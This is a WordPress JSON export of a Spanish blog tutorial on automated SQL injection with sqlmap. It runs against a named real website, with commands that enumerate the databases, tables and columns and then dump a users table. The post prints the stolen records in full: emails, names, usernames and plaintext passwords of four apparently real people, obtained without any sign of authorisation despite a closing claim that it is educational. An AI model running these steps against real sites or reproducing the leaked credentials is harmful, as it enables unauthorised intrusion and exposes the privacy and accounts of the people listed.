{"id":192,"date":"2014-04-06T22:53:34","date_gmt":"2014-04-06T23:04:22","guid":{"rendered":"https:\/\/f963esqlmap_1_.png"},"modified":"2016-07-06T11:38:20","modified_gmt":"2016-07-06T17:38:20","slug":"inyecciones-sql-automatizadas-con-sqlmap","status":"publish","type":"post","link":"https:\/\/emanuelpaxtian.com\/blog\/inyecciones-sql-automatizadas-con-sqlmap\/","title":{"rendered":"Inyecciones sql automatizadas con SQLMAP"},"content":{"rendered":"<p>En este tutorial veremos como obtener los datos de admin de una base de datos utilizando SQLMAP.<br \/>\nPara este tutorial se usara Backtrack, ya que viene instalado y est\u00e1 listo para usarse<\/p>\n<p>Para abrirlo vamos a:<\/p>\n<p><strong>Applications\u00a0 &gt;&gt;\u00a0 Backtrack\u00a0 &gt;&gt;\u00a0 Exploitation Tools\u00a0 &gt;&gt;\u00a0 Web Exploitation Tools\u00a0 &gt;&gt;\u00a0 sqlmap<\/strong><\/p>\n<p>A penas abrimos sqlmap, podremos ver todos los par\u00e1metros disponibles, ahora solo usaremos los elementales.<\/p>\n<div class=\"separator\">\u00a0<img loading=\"lazy\" decoding=\"async\" src=\"..\/fotos\/2.png\" alt=\"\" width=\"604\" height=\"418\" border=\"0\" \/><\/div>\n<p>Voy a usar una web vulnerable\u00a0<strong>smartenergyhome.eu<\/strong><br \/>\nLas querys las haremos desde aqu\u00ed:\u00a0<strong>smartenergyhome.eu\/eng\/seh-buildings.php?id=9\u00a0<\/strong><\/p>\n<p><strong>Extracci\u00f3n de informaci\u00f3n<\/strong><\/p>\n<p>Comenzaremos sacando los nombres de las bases de datos, para ello tipeamos:<\/p>\n<p><strong>python sqlmap.py -u target.com\/index.php?id=9 &#8211;dbs<\/strong><\/p>\n<div class=\"separator\">\u00a0<img loading=\"lazy\" decoding=\"async\" src=\"..\/fotos\/3.png\" alt=\"\" width=\"669\" height=\"72\" border=\"0\" \/><\/div>\n<p>El programa comenzara a buscar las bases de datos y las mostrara una vez que finalice de correr<\/p>\n<div class=\"separator\">\u00a0<img loading=\"lazy\" decoding=\"async\" src=\"..\/fotos\/4.png\" alt=\"\" width=\"669\" height=\"315\" border=\"0\" \/><\/div>\n<p>En mi caso me trajo 2, de las cuales una es por el cpanel y la otra es de la web.<br \/>\nLa que usaremos ser\u00e1 la segunda \u201c<strong>smartene_SEH<\/strong>\u201d<br \/>\nAhora que tenemos el nombre de la base de datos, sigue buscar las tablas que posee, para ello vamos a tipear:<\/p>\n<p><strong>python sqlmap.py -u target.com\/index.php?id=9 \u2013D smartene_SEH &#8212; tables<\/strong><\/p>\n<div class=\"separator\">\u00a0<img loading=\"lazy\" decoding=\"async\" src=\"..\/fotos\/5.png\" alt=\"\" width=\"669\" height=\"27\" border=\"0\" \/><\/div>\n<p>Este comando nos arrojara todas las tablas que tiene el sistema, y obviamente debemos buscar alguna que contenga datos de administradores para podernos loguear<\/p>\n<div class=\"separator\">\u00a0<img loading=\"lazy\" decoding=\"async\" src=\"..\/fotos\/6.png\" alt=\"\" width=\"260\" height=\"253\" border=\"0\" \/><\/div>\n<p>En mi caso, la \u00faltima tabla tiene el nombre \u201cusuarios\u201d por lo tanto, esa debe ser la tabla que tiene los datos de los admines.<br \/>\nAhora veremos las columnas que tiene esa tabla de usuarios, para ver si en verdad tiene alg\u00fan usuario y contrase\u00f1a para luego entrar al panel de admin\u2026<br \/>\nAhora que conocemos el nombre de la tabla, vamos a tipear ahora lo siguiente:<\/p>\n<p><strong>python sqlmap.py -u target.com\/index.php?id=9 \u2013D smartene_SEH \u2013T usuarios &#8212; columns<\/strong><\/p>\n<div class=\"separator\">\u00a0<img loading=\"lazy\" decoding=\"async\" src=\"..\/fotos\/7.png\" alt=\"\" width=\"668\" height=\"34\" border=\"0\" \/><\/div>\n<p>Esto nos devolver\u00e1 los nombres de las columnas que tiene dicha tabla.<\/p>\n<div><\/div>\n<div class=\"separator\">\u00a0<img loading=\"lazy\" decoding=\"async\" src=\"..\/fotos\/8.png\" alt=\"\" width=\"323\" height=\"232\" border=\"0\" \/><\/div>\n<div><\/div>\n<div>Como podemos ver, hemos dado con la tabla que busc\u00e1bamos. Esta tabla posee usuarios y contrase\u00f1as.<br \/>\nPara poder ver que datos contiene esta tabla, vamos a tipear:<\/div>\n<div><strong>python sqlmap.py -u target.com\/index.php?id=9 \u2013D smartene_SEH \u2013T usuarios &#8211; -dump<\/strong><\/div>\n<div>Una vez ejecutado el comando, nos dar\u00e1 los datos que contiene esa tabla<\/div>\n<div><\/div>\n<div class=\"separator\">\u00a0<img loading=\"lazy\" decoding=\"async\" src=\"..\/fotos\/10.png\" alt=\"\" width=\"668\" height=\"168\" border=\"0\" \/><\/div>\n<div><\/div>\n<div><\/div>\n<div>\n<div >\n<div class=\"toolbar\"><a href=\"http:\/\/www.antrax-labs.org\/2012\/10\/sqli-automatizado-con-sqlmap.html\">?<\/a><\/div>\n<table class=\"table table-hover\">\n<tbody>\n<tr>\n<td class=\"gutter\">\n<div class=\"line number1 index0 alt2\">1<\/div>\n<div class=\"line number2 index1 alt1\">2<\/div>\n<div class=\"line number3 index2 alt2\">3<\/div>\n<div class=\"line number4 index3 alt1\">4<\/div>\n<div class=\"line number5 index4 alt2\">5<\/div>\n<div class=\"line number6 index5 alt1\">6<\/div>\n<div class=\"line number7 index6 alt2\">7<\/div>\n<div class=\"line number8 index7 alt1\">8<\/div>\n<\/td>\n<td class=\"code\">\n<div class=\"container\">\n<div class=\"line number1 index0 alt2\"><code class=\"text plain\">+----+------------------------+------------------+----------+---------------------+----------+<\/code><\/div>\n<div class=\"line number2 index1 alt1\"><code class=\"text plain\">| id | email\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 | nombre\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 | usuario\u00a0 | editado\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 | password |<\/code><\/div>\n<div class=\"line number3 index2 alt2\"><code class=\"text plain\">+----+------------------------+------------------+----------+---------------------+----------+<\/code><\/div>\n<div class=\"line number4 index3 alt1\"><code class=\"text plain\">| 1\u00a0 | g.zapico@netavanza.com | Gustavo Zapico\u00a0\u00a0 | gzapico\u00a0 | 2009-03-02 06:02:34 | medica3\u00a0 |<\/code><\/div>\n<div class=\"line number5 index4 alt2\"><code class=\"text plain\">| 2\u00a0 | genis@vis-tek.com\u00a0\u00a0\u00a0\u00a0\u00a0 | Gen\\xeds Bayarri | gbayarri | 2009-03-02 06:20:37 | vis-tek\u00a0 |<\/code><\/div>\n<div class=\"line number6 index5 alt1\"><code class=\"text plain\">| 3\u00a0 | j.berg@bwcv.es\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 | Josefin Berg\u00a0\u00a0\u00a0\u00a0 | jberg\u00a0\u00a0\u00a0 | 2009-03-12 05:05:38 | seh2009\u00a0 |<\/code><\/div>\n<div class=\"line number7 index6 alt2\"><code class=\"text plain\">| 4\u00a0 | l.bax@bwcv.es\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 | Laszlo Bax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 | lbax\u00a0\u00a0\u00a0\u00a0 | 2010-03-26 16:46:18 | seh2009\u00a0 |<\/code><\/div>\n<div class=\"line number8 index7 alt1\"><code class=\"text plain\">+----+------------------------+------------------+----------+---------------------+----------+<\/code><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<div>Al ser este un tutorial educativo, no ingresaremos al sistema. Simplemente se expone el manejo de esta poderosa herramienta.<\/div>\n<div>Por: ANTRAX<\/div>\n","protected":false},"excerpt":{"rendered":"<p>En este tutorial veremos como obtener los datos de admin de una base de datos utilizando SQLMAP. Para este tutorial se usara Backtrack, ya que viene instalado y est\u00e1 listo&hellip;<\/p>\n","protected":false},"author":1,"featured_media":713,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,14,10],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hacking","category-mysql","category-seguridad"],"_links":{"self":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":0,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/media\/713"}],"wp:attachment":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}